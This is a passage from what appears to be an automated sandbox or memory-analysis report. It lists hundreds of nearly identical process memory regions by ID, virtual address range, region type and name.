11303 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11304 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11305 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11306 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11307 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11308 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11309 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11310 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11311 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11312 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11313 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11314 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11315 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11316 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11317 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11318 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11319 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11320 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11321 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11322 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11323 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11324 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11325 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11326 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11327 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11328 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11329 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11330 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11331 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11332 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11333 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11334 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11335 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11336 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11338 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11339 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11340 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11341 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11342 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11343 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11344 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11346 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11347 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11348 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11349 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11350 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11351 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11352 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11353 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11354 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11355 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11356 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11357 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11358 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11359 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11360 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11361 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11362 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11363 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11364 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11365 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11366 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 11367 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11368 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11369 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11405 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11406 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11407 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11408 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11417 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11418 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11419 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11433 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11435 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11440 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11486 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
11488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11489 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11492 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11493 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11494 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11495 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11496 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11497 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11498 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11499 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11500 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 11501 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11502 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11503 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11504 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11505 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11506 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11507 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11508 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11510 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11511 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11512 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11513 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11514 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11515 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11516 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11517 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11518 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11519 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11520 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11521 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11522 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11523 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11524 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11525 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11526 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11527 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11528 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11529 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11530 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11531 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11532 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11533 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11534 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11535 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11536 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11537 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11538 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11539 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11540 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11541 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11542 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11543 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11544 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11545 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11700 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11701 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11702 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11703 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11704 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11705 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11706 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11707 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11708 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11709 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
